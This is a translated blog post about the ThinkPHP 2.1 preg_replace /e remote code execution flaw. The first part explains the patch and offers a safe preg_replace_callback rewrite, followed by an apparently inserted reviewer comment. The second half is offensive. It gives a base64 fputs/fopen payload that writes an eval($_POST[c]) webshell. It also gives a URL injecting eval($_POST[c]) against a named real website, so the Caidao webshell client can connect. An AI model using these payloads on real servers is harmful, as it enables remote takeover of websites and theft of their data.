ThinkPHP 2.1
Let's analyze the vulnerability.
An official security patch has been released. This URL security vulnerability lets a user forge a URL on the client side and execute illegal code on the server.
Official patch: /Trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
125-$ res = preg_replace ('@ (w + )'. $ depr. '([^ '. $ depr. '/] +) @ E',' $ var ['\ 1'] = "\ 2";', implode ($ depr, $ paths ));
125 + $ res = preg_replace ('@ (w + )'. $ depr. '([^ '. $ depr. '/] +) @ E',' $ var ['\ 1'] =' \ 2'; ', implode ($ depr, $ paths ));
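Review bot: the fix only changes the quotes around the captured `\2` from double to single, which stops PHP from interpolating `${...}` inside the evaluated replacement, but it keeps the `@E` (`/e`) modifier, so the replacement string is still evaluated as PHP code with the URL segment pasted into a string literal. Since the character class `[^'.$depr.'/]+` does not exclude single quotes, a segment containing `'` can still close that literal early. The robust change is to drop `/e` altogether and assign the matches from a `preg_replace_callback` callback, or to pair the exploded path segments in a loop, so the URL value is only ever handled as data.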
This code parses PATH_INFO as a RESTful-style URL: it extracts the key/value pairs in PATH_INFO and merges them into the $_GET array.
However, when it parses PATH_INFO with a regular expression, it uses the following statement (the pre-patch, vulnerable version):
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr, $paths));
This uses the /e modifier of preg_replace, which is very dangerous: with /e, the second argument (the replacement string) is executed as PHP code after the backreferences have been substituted. The author relies on this to assign the captured values to the array dynamically from inside the replacement string:
'$var[\'\\1\']="\\2";'
The captured value is wrapped in double quotation marks, and PHP parses variable syntax inside double-quoted strings, so an expression such as ${...} placed in the URL segment is evaluated. An attacker can therefore execute arbitrary PHP code against any application written with the ThinkPHP framework by requesting a URL of the following form:
index.php/module/action/param1/${@print(THINK_VERSION)}
The execution result is shown as a screenshot in the original post.
In other words, print() runs, so arbitrary code can be executed; other functions such as phpinfo() work in the same way.
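To show what the parser looks like once the /e evaluation is gone, here is an added example (my own code, not ThinkPHP's) that parses the same RESTful PATH_INFO with preg_replace_callback, so the captured segment is stored as data and never evaluated; the function name parsePathInfo, the sample URLs, and the assumption that the first two segments are module and action (ThinkPHP's convention) are mine.

```php
<?php
// Added example, not ThinkPHP's own code. It re-implements the PATH_INFO
// parsing from Dispatcher.class.php without preg_replace's /e modifier.
// With /e (deprecated in PHP 5.5, removed in PHP 7) the replacement string
// '$var[\'\\1\']="\\2";' was evaluated as PHP source, so a URL segment such as
// ${@print(THINK_VERSION)} was interpolated and executed. Here the captured
// value only ever lands in an array element and is never evaluated.
function parsePathInfo(string $pathInfo, string $depr = '/'): array
{
    $paths = explode($depr, trim($pathInfo, $depr));
    // Assumption: the first two segments are module and action, as in ThinkPHP.
    $module = array_shift($paths) ?? '';
    $action = array_shift($paths) ?? '';

    $var = [];
    $d   = preg_quote($depr, '@');
    // preg_replace_callback is the direct replacement for /e: the callback
    // receives the matches as data and stores them as plain strings.
    preg_replace_callback(
        '@(\w+)' . $d . '([^' . $d . '/]+)@',
        function (array $m) use (&$var): string {
            $var[$m[1]] = $m[2];
            return '';
        },
        implode($depr, $paths)
    );
    return ['module' => $module, 'action' => $action, 'params' => $var];
}

// Constructed sample requests; the second carries the page's proof-of-concept segment.
$samples = [
    '/module/action/param1/value1/param2/value2',
    '/module/action/param1/${@print(THINK_VERSION)}',
];
foreach ($samples as $pathInfo) {
    $parsed = parsePathInfo($pathInfo);
    // The ${...} payload stays an inert string in $parsed['params']['param1'];
    // the parser itself prints nothing and defines no THINK_VERSION.
    var_export($parsed);
    echo PHP_EOL;
}
```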
That's all.
We can use the fputs and fopen functions directly to write a Trojan. Construct the statement:
fputs(fopen(base64_decode("bW0ucGhw"), "w"), base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4="))
base64_decode("bW0ucGhw") decodes to mm.php.
base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=") decodes to <?eval($_POST[c]);?>.
Once executed, this creates the Trojan file mm.php in the current directory.
However, an error occurred during execution: the double quotation marks are escaped.
Then I tried several other pieces of code that do not use double quotation marks to write the Trojan.
All failed, because angle brackets (<>) and the like are escaped, and exec() and other system-command-execution functions cannot be used to write it either.
The methods found online seem very rare; there is only the method of using echo to write the Trojan, but that only succeeds if the double quotation marks are not escaped.
What should I do?
At this point, don't get too stuck on it.
How can a Chinese man forget the "kitchen knife" (Caidao), the webshell client written by the Chinese?
Directly construct the URL:
http://www.bkjia.com/project/xaa/index.php/module/action/param1/${@print(eval($_POST[c]))}
Enter the path and the password c into the kitchen knife to connect.
There is no need to write a Trojan file at all.
Author: Seay's blog